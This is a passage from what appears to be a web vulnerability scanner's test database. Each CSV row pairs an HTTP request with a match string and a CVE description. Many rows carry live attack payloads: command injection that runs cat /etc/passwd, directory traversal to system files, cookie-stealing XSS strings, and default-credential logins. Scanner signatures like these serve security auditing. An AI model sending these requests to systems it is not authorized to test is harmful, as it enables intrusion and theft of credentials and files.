i\",\"\",\"\"\n\"003048\",\"3337\",\"3\",\"/nul..cfm\",\"GET\",\"The template specification\",\"\",\"\",\"\",\"\",\"ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. Macromedia MPSB02-01. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906\",\"\",\"\"\n\"003049\",\"3337\",\"3\",\"/nul..dbm\",\"GET\",\"The template specification\",\"\",\"\",\"\",\"\",\"ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. Macromedia MPSB02-01. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906\",\"\",\"\"\n\"003050\",\"3337\",\"3\",\"/nul.cfm\",\"GET\",\"The requested file\",\"\",\"\",\"\",\"\",\"ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906\",\"\",\"\"\n\"003051\",\"3337\",\"3\",\"/nul.dbm\",\"GET\",\"The requested file\",\"\",\"\",\"\",\"\",\"ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906\",\"\",\"\"\n\"003053\",\"3380\",\"8\",\"@CGIDIRSimagemap\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"imagemap.exe was found. Many versions from different vendors contain flaws.\",\"\",\"\"\n\"003054\",\"3380\",\"8\",\"@CGIDIRSimagemap.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"imagemap.exe was found. Many versions from different vendors contain flaws.\",\"\",\"\"\n\"003055\",\"3382\",\"3\",\"@CGIDIRShtimage.exe/path/filename?2,2\",\"GET\",\"tried the following\",\"\",\"\",\"\",\"\",\"htimage.exe can provide physical path of web server. BID-964. BID-1141.\",\"\",\"\"\n\"003056\",\"3384\",\"d\",\"@CGIDIRShtimage.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"htimage.exe may be vulnerable to a buffer overflow in the mapname portion. MS00-028. BID-1117\",\"\",\"\"\n\"003057\",\"3396\",\"7\",\"/mlog.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Remote file read vulnerability 1999-0068\",\"\",\"\"\n\"003058\",\"3396\",\"7\",\"/mlog.phtml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Remote file read vulnerability 1999-0068\",\"\",\"\"\n\"003059\",\"3396\",\"7\",\"/mylog.html?screen=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file read vulnerability 1999-0068\",\"\",\"\"\n\"003060\",\"3396\",\"7\",\"/mylog.phtml?screen=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file read vulnerability 1999-0068\",\"\",\"\"\n\"003061\",\"3396\",\"7\",\"/php/mlog.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003062\",\"3396\",\"7\",\"/php/mlog.phtml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003063\",\"3396\",\"7\",\"/php/mylog.html?screen=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003064\",\"3396\",\"7\",\"/php/mylog.phtml?screen=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003065\",\"3396\",\"7\",\"/fi?/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003069\",\"3399\",\"d\",\"/CFIDE/administrator/index.cfm\",\"GET\",\"PasswordProvided\",\"cfadminPassword\",\"\",\"\",\"\",\"ColdFusion Administrator found. ColdFusion 4.5.1 and earlier may have an overflow by submitting a 40k character password. CVE-2000-0538. BID-1314.\",\"\",\"\"\n\"003070\",\"3407\",\"7\",\"/directory.php?dir=%3Bcat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Marcus S. Xenakis directory.php script allows for command execution. CVE-2002-0434.\",\"\",\"\"\n\"003071\",\"3410\",\"7\",\"/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"SunPS iRunbook Version 2.5.2 allows files to be read remotely.\",\"\",\"\"\n\"003072\",\"3410\",\"7\",\"/content/base/build/explorer/none.php?/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"SunPS iRunbook Version 2.5.2 allows files to be read remotely.\",\"\",\"\"\n\"003073\",\"3411\",\"3\",\"/soapConfig.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle 9iAS configuration file found - see bugtraq #4290.\",\"\",\"\"\n\"003074\",\"3412\",\"7\",\"@CGIDIRSbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320\",\"\",\"\"\n\"003075\",\"3412\",\"7\",\"@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320\",\"\",\"\"\n\"003076\",\"3414\",\"3\",\"@CGIDIRSGW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA\",\"GET\",\"SYS:\",\"\",\"\",\"\",\"\",\"Some Netware web servers reveal the system path to files when unexpected arguments are sent to CGI.\",\"\",\"\"\n\"003077\",\"3416\",\"7\",\"/GW5/GWWEB.EXE?HELP=bad-request\",\"GET\",\"Could not find file SYS\",\"\",\"\",\"\",\"\",\"Groupwise allows system information and file retrieval by modifying arguments to the help system.\",\"\",\"\"\n\"003078\",\"3416\",\"7\",\"/GWWEB.EXE?HELP=bad-request\",\"GET\",\"Could not find file SYS\",\"\",\"\",\"\",\"\",\"Groupwise allows system information and file retrieval by modifying arguments to the help system. CVE-2002-0341.\",\"\",\"\"\n\"003079\",\"3416\",\"7\",\"@CGIDIRSGW5/GWWEB.EXE?HELP=bad-request\",\"GET\",\"Could not find file SYS\",\"\",\"\",\"\",\"\",\"Groupwise allows system information and file retrieval by modifying arguments to the help system.\",\"\",\"\"\n\"003080\",\"3416\",\"7\",\"@CGIDIRSGWWEB.EXE?HELP=bad-request\",\"GET\",\"Could not find file SYS\",\"\",\"\",\"\",\"\",\"Groupwise allows system information and file retrieval by modifying arguments to the help system.\",\"\",\"\"\n\"003081\",\"3417\",\"4\",\"/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. CVE-2003-0624. CA-2000-02.\",\"\",\"\"\n\"003082\",\"3423\",\"3\",\"/XSQLConfig.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle 9iAS configuration file found - see bugtraq #4290.\",\"\",\"\"\n\"003083\",\"3458\",\"4\",\"/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CVE-2002-0375. CA-2000-02.\",\"\",\"\"\n\"003084\",\"3483\",\"3\",\"/docs/<script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"Nokia Electronic Documentation is vulnerable to Cross Site Scripting (XSS). CVE-2003-0801.\",\"\",\"\"\n\"003085\",\"3484\",\"3\",\"/docs/NED?action=retrieve&location=.\",\"GET\",\"docs\\\\ned\",\"\",\"\",\"\",\"\",\"Nokia Electronic Documentation allows directory listings and reveals its installation path. CVE-2003-0802.\",\"\",\"\"\n\"003086\",\"3486\",\"4\",\"/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CVE-2001-1212, CA-2000-02.\",\"\",\"\"\n\"003087\",\"3487\",\"d\",\"/lcgi/ndsobj.nlm\",\"GET\",\"SCRIPT_NAME\",\"\",\"\",\"\",\"\",\"Novell Netware 5.1 contains a buffer overflow, also, if Groupwise is enabled remote enumeration of users, groups and system information might be possible.CVE-2001-1233\",\"\",\"\"\n\"003088\",\"3489\",\"3\",\"/surf/scwebusers\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SurfControl SuperScout Web Reports Server user and password file is available. CVE-2002-0705.\",\"\",\"\"\n\"003089\",\"3500\",\"8\",\"/_vti_bin/fpcount.exe\",\"GET\",\"specified CGI application misbehaved\",\"\",\"\",\"\",\"\",\"Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. CVE-1999-1376. BID-2252.\",\"\",\"\"\n\"003090\",\"3501\",\"3\",\"/_private/form_results.htm\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"This file may contain information submitted by other web users via forms. CVE-1999-1052.\",\"\",\"\"\n\"003091\",\"3501\",\"3\",\"/_private/form_results.html\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"This file may contain information submitted by other web users via forms. CVE-1999-1052.\",\"\",\"\"\n\"003092\",\"3501\",\"3\",\"/_private/form_results.txt\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"This file may contain information submitted by other web users via forms. CVE-1999-1052.\",\"\",\"\"\n\"003093\",\"3512\",\"7\",\"/scripts/tools/getdrvrs.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).\",\"\",\"\"\n\"003094\",\"3513\",\"7\",\"@CGIDIRSwebbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"WebBBS by Darryl Burgdorf is vulnerable to command execution.\",\"\",\"\"\n\"003095\",\"3514\",\"7\",\"@CGIDIRSvote.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Mike's Vote CGI contained a bug which allowed arbitrary command execution (version 1.2), see http://freshmeat.net/projects/mikessurveycgi/\",\"\",\"\"\n\"003096\",\"3515\",\"7\",\"@CGIDIRSquizme.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Mike's Quiz Me! CGI contained a bug which allowed arbitrary command execution (version 0.5), see http://freshmeat.net/users/mikespice/\",\"\",\"\"\n\"003097\",\"3565\",\"3\",\"/\",\"OPTIONS\",\"not found for:\",\"\",\"\",\"\",\"\",\"By sending an OPTIONS request for /, the physical path to PHP can be revealed. CVE-2002-0240, BID-8119, BID-4057, http://archives.neohapsis.com/archives/bugtraq/2002-02/0043.html.\",\"\",\"\"\n\"003098\",\"3566\",\"7\",\"/shop/normal_html.cgi?file=../../../../../../etc/issue%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely. CVE-2003-0243.\",\"\",\"\"\n\"003099\",\"3566\",\"7\",\"/shop/normal_html.cgi?file=;cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.\",\"\",\"\"\n\"003100\",\"3566\",\"7\",\"/shop/normal_html.cgi?file=|cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.\",\"\",\"\"\n\"003101\",\"3567\",\"7\",\"/shop/member_html.cgi?file=;cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.\",\"\",\"\"\n\"003102\",\"3567\",\"7\",\"/shop/member_html.cgi?file=|cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.\",\"\",\"\"\n\"003103\",\"3568\",\"7\",\"@CGIDIRSsendform.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent. CVE-2002-0710. BID-5286.\",\"\",\"\"\n\"003104\",\"3569\",\"7\",\"/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Citrix CGI allows directory traversal.\",\"\",\"\"\n\"003105\",\"3570\",\"2\",\"/proxy/ssllogin?user=administrator&password=administrator\",\"GET\",\">administrator<\",\"\",\"\",\"\",\"\",\"Compaq Web-Based Management allows login with ID/pass 'administrator'/'administrator'.\",\"\",\"\"\n\"003106\",\"3570\",\"2\",\"/proxy/ssllogin?user=administrator&password=operator\",\"GET\",\">operator<\",\"\",\"\",\"\",\"\",\"Compaq Web-Based Management allows login with ID/pass 'operator'/'operator'.\",\"\",\"\"\n\"003107\",\"3570\",\"2\",\"/proxy/ssllogin?user=administrator&password=user\",\"GET\",\">user<\",\"\",\"\",\"\",\"\",\"Compaq Web-Based Management allows login with ID/pass 'user'/'user'.\",\"\",\"\"\n\"003108\",\"3587\",\"7\",\"@CGIDIRSFileSeek.cgi?head=&foot=;cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003109\",\"3587\",\"7\",\"@CGIDIRSFileSeek.cgi?head=;cat%20/etc/passwd|&foot=\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003110\",\"3588\",\"7\",\"@CGIDIRSFileSeek2.cgi?head=&foot=;cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003111\",\"3588\",\"7\",\"@CGIDIRSFileSeek2.cgi?head=;cat%20/etc/passwd|&foot=\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003112\",\"3589\",\"7\",\"@CGIDIRSFileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003113\",\"3589\",\"7\",\"@CGIDIRSFileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003114\",\"3590\",\"7\",\"@CGIDIRSFileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003115\",\"3590\",\"7\",\"@CGIDIRSFileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003116\",\"3591\",\"b\",\"/project/index.php?m=projects&user_cookie=1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.\",\"\",\"\"\n\"003117\",\"3632\",\"4\",\"/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003118\",\"3633\",\"4\",\"/webcalendar/week.php?user=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003119\",\"369\",\"3\",\"/active.log\",\"GET\",\"WEBactive Http Server\",\"\",\"\",\"\",\"\",\"The WebActive log is accessible remotely.\",\"\",\"\"\n\"003120\",\"3761\",\"7\",\"/?pattern=/etc/*&sort=name\",\"GET\",\"passwd\",\"\",\"hosts\",\"\",\"\",\"The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.\",\"\",\"\"\n\"003121\",\"3761\",\"7\",\"/images/?pattern=/etc/*&sort=name\",\"GET\",\"passwd\",\"\",\"hosts\",\"\",\"\",\"The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.\",\"\",\"\"\n\"003122\",\"3762\",\"4\",\"/debug/dbg?host==<script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.\",\"\",\"\"\n\"003123\",\"3762\",\"4\",\"/debug/echo?name=<script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.\",\"\",\"\"\n\"003124\",\"3762\",\"4\",\"/debug/errorInfo?title===<script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.\",\"\",\"\"\n\"003125\",\"3762\",\"4\",\"/debug/showproc?proc===<script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.\",\"\",\"\"\n\"003126\",\"379\",\"8\",\"/site/eg/source.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CVE-2000-0628.\",\"\",\"\"\n\"003127\",\"3800\",\"7\",\"@PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"phpMyAdmin is vulnerable to a directory traversal attack.\",\"\",\"\"\n\"003128\",\"383\",\"2\",\"/~nobody/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf.\",\"\",\"\"\n\"003129\",\"3856\",\"3\",\"/admin/db.php\",\"POST\",\"e107 sql-dump\",\"\",\"\",\"\",\"\",\"The e107 management system allows the remote SQL database to be dumped to the user, and it may contained hashed passwords. BID-8273.\",\"dump_sql=foo\",\"\"\n\"003130\",\"3856\",\"3\",\"/admin/db.php?dump_sql=1\",\"GET\",\"e107 sql-dump\",\"\",\"\",\"\",\"\",\"e107 allows a dump of the MySQL database without authentication.\",\"\",\"\"\n\"003131\",\"3861\",\"7\",\"/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This install of DCForum allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"003132\",\"3861\",\"7\",\"@CGIDIRSdcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This install of DCForum allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"003133\",\"388\",\"3\",\"/%00/\",\"GET\",\"Directory listing of\",\"\",\"\",\"\",\"\",\"Remote directories can be retrieved through Roxen, upgrade the server.\",\"\",\"\"\n\"003134\",\"4\",\"6\",\"/iissamples/exair/search/advsearch.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.\",\"\",\"\"\n\"003135\",\"4013\",\"2bd\",\"/isqlplus\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt\",\"\",\"\"\n\"003136\",\"4161\",\"2\",\"/data/member_log.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Teekai's forum full 1.2 member's log can be retrieved remotely.\",\"\",\"\"\n\"003137\",\"4161\",\"2\",\"/data/userlog/log.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Teekai's Tracking Online 1.0 log can be retrieved remotely.\",\"\",\"\"\n\"003138\",\"4161\",\"2\",\"/userlog.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Teekai's Tracking Online 1.0 log can be retrieved remotely.\",\"\",\"\"\n\"003139\",\"4164\",\"7\",\"/internal.sws?../../../../../../../../winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.\",\"\",\"\"\n\"003140\",\"4164\",\"7\",\"/internal.sws?../../../../../../../../winnt/win.ini\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.\",\"\",\"\"\n\"003141\",\"4165\",\"7\",\"/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.\",\"\",\"\"\n\"003142\",\"4165\",\"7\",\"/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.\",\"\",\"\"\n\"003143\",\"4171\",\"2\",\"/ASP/cart/database/metacart.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003144\",\"4171\",\"2\",\"/database/metacart.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003145\",\"4171\",\"2\",\"/mcartfree/database/metacart.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003146\",\"4171\",\"2\",\"/metacart/database/metacart.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003147\",\"4171\",\"2\",\"/shop/database/metacart.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003148\",\"4171\",\"2\",\"/shoponline/fpdb/shop.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003149\",\"4171\",\"2\",\"/shopping/database/metacart.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003150\",\"4174\",\"4\",\"/search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phPay v2.02 cross site scripting. http://phpay.sourceforge.net/.\",\"\",\"\"\n\"003151\",\"35877\",\"3\",\"/admin/phpinfo.php\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Immobilier allows phpinfo() to be run.\",\"\",\"\"\n\"003152\",\"4176\",\"3\",\"/start.php?config=alper.inc.php\",\"GET\",\"Failed opening required\",\"\",\"\",\"\",\"\",\"phPay v2.02 information disclosure. http://phpay.sourceforge.net/.\",\"\",\"\"\n\"003153\",\"4177\",\"3\",\"/login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang\",\"GET\",\"Failed opening required\",\"\",\"\",\"\",\"\",\"phPay v2.02 information disclosure. http://phpay.sourceforge.net/.\",\"\",\"\"\n\"003154\",\"4191\",\"7\",\"/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"KorWebLog from http://weblog.kldp.org/ allows any file to be read on the system.\",\"\",\"\"\n\"003155\",\"4192\",\"d\",\"@CGIDIRSgettransbitmap\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sun Answerbook2 is vulnerable to a buffer overflow in the gettransbitmap CGI. All default CGIs should be disabled or removed, and Answerbook2 should be disabled if not being used.\",\"\",\"\"\n\"003156\",\"4220\",\"8\",\"@CGIDIRSguestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"cpanel's guestbook.cgi allows any command to be executed on the remote server. Remove /usr/local/cpanel/cgi-sys/guestbook.cgi or update to a new version of cpanel.\",\"\",\"\"\n\"003157\",\"4231\",\"3\",\"/JUNK(5).xml\",\"GET\",\"file:\",\"\",\"\",\"file:hover\",\"\",\"Coccoon from Apache-XML project reveals file system path in error messages.\",\"\",\"\"\n\"003158\",\"4231\",\"3\",\"/JUNK(5)/\",\"GET\",\"FileNotFoundException: \\/\",\"\",\"\",\"\",\"\",\"Coccoon 2.1.4 from Apache-XML project reveals file system path in error messages.\",\"\",\"\"\n\"003159\",\"4233\",\"1\",\"/cgi-bin/main_menu.pl\",\"GET\",\"NetDetector Traffic Analysis\",\"\",\"\",\"\",\"\",\"The NetDetector allows unauthenticated users to perform database queries.\",\"\",\"\"\n\"003160\",\"4237\",\"2\",\"/ban.bak\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.\",\"\",\"\"\n\"003161\",\"4237\",\"2\",\"/ban.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.\",\"\",\"\"\n\"003162\",\"4237\",\"2\",\"/ban.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.\",\"\",\"\"\n\"003163\",\"4237\",\"2\",\"/banmat.pwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.\",\"\",\"\"\n\"003164\",\"4238\",\"2\",\"/admin/adminproc.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Xpede administration page may be available. The /admin directory should be protected.\",\"\",\"\"\n\"003165\",\"4239\",\"2\",\"/admin/datasource.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Xpede page reveals SQL account name. The /admin directory should be protected.\",\"\",\"\"\n\"003166\",\"4240\",\"9\",\"/utils/sprc.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Xpede page may allow SQL injection.\",\"\",\"\"\n\"003167\",\"4241\",\"2\",\"/reports/temp/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Xpede reports directory should not be browsable.\",\"\",\"\"\n\"003168\",\"4245\",\"3\",\"@CGIDIRSrtm.log\",\"GET\",\"HttpPost Retry\",\"\",\"\",\"\",\"\",\"Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.\",\"\",\"\"\n\"003169\",\"4261\",\"3\",\"@CGIDIRSVsSetCookie.exe?\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A flaw in VsSetCookie.exe may allow attackers to guess a correct user name & gain access to the Lucent 